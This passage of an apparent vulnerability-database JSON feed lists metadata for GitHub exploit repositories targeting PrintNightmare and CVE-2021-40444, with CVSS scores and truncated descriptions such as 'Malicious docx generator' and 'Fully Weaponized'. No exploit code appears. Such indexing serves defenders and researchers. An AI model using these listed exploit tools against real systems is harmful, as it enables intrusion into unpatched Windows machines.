1}, {"lastseen": "2021-12-10T15:22:32", "description": "# Windows Print Spooler Service RCE CVE-2021-1675 (PrintNightmar...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T12:25:21", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:03:49", "id": "B8D9E2C0-202B-5806-88D2-B0E797582618", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:22", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-12T08:18:40", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:07:00", "id": "F1347375-6380-5145-9881-486B76875649", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T03:44:07", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-29T17:24:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T03:06:53", "id": "E82ECEEF-07B8-5340-BAC6-FA5B0E964772", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T23:46:37", "description": "# CVE-2021-34527-CVE-2021-1675\nPrintNightmare+Manual\nhttps://sat...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-19T23:20:58", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-02-19T23:20:58", "id": "86F04665-0984-596F-945A-3CA176A53057", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:22:37", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nTwo mini Script to check if th...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T12:12:16", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-02T07:49:06", "id": "F92F972D-7309-5D0B-BCC2-054883AE83E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:37:24", "description": "# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-18T12:17:12", "id": "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T21:17:11", "description": "# PrintNightmare (CVE-2021-1675)\n\nThis Zeek script detects succe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T16:44:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T16:56:12", "id": "3399B834-8492-5C0C-AA14-7F120BA37AF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444 Analysis\n\nThis repository contains the deobfusc...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-09T15:43:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T08:18:40", "id": "7333A285-768C-5AD9-B64E-0EC75F075597", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T02:36:46", "description": "# CVE-2021-40444\n\n## Usage\n\nEnsure to run `setup.sh` first as yo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-03T01:13:42", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-09-16T21:47:57", "id": "9366C7C7-BF57-5CFF-A1B5-8D8CF169E72A", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:35:39", "description": "# cve-2021-40444\nReverse engineering the \"A Letter Before Court ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-12T09:27:40", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-12T12:00:29", "id": "E06577DB-A581-55E1-968E-81430C294A84", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:15", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-25T05:13:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-11-25T05:13:19", "id": "7643EC22-CCD0-56A6-9113-B5EF435E22FC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:08", "description": "MSHTMHell: Malicious document bui...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T15:33:41", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-14T13:49:09", "id": "588DA6EE-E603-5CF2-A9A3-47E98F68926C", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:39", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-11T09:21:29", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-20T15:39:54", "id": "0D0DAF60-4F3C-5B17-8BAB-5A8A73BC25CC", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:54", "description": "# Caboom\n\n```\n \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2588\u2588\u2588\u2557 \u2588\u2588\u2588\u2557 \u2588...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-11T16:31:05", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-05-13T12:52:15", "id": "6BC80C90-569E-5084-8C0E-891F12F1805E", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-15T21:37:40", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T16:55:53", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-15T15:41:32", "id": "72881C31-5BFD-5DAF-9D20-D6170EEC520D", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T09:23:03", "description": "# CVE-2021-40444-CAB\nCVE-2021-40444 - Custom CAB templates from ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-16T10:14:08", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-09T17:56:16", "id": "24DE1902-4427-5442-BF63-7657293966E2", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:38:56", "description": "# Fully Weaponized CVE-2021-40444\n\nMalicious docx generator to e...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-10-24T23:17:12", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-10-24T23:17:28", "id": "CC6DFDC6-184F-5748-A9EC-946E8BA5FB04", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:05:00", "description": "# CVE-2021-40444-Sample\nPatch CAB: https:/...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-10T09:43:41", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-07-12T14:51:36", "id": "28B1FAAB-984F-5469-BC0D-3861F3BCF3B5", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T19:04:29", "description": "# CVE-2021-40444 PoC\n\nMalicious docx generator to exploit CVE-20...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T20:32:28", "type": "githubexploit", "title": "Exploit for Path Traversal in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-18T19:46:25", "id": "7DE60C34-40B8-50E4-B1A0-FC1D10F97677", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-24T07:50:01", "description": "# CVE-2021-40444_CAB_archives\nCVE-2021-40444 - Custom CAB templa...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, 